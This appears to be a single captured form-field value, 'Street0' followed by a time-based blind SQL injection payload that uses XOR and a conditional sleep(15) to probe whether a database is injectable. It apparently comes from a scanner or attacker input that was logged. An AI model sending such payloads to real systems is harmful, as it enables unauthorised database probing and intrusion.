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Street0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z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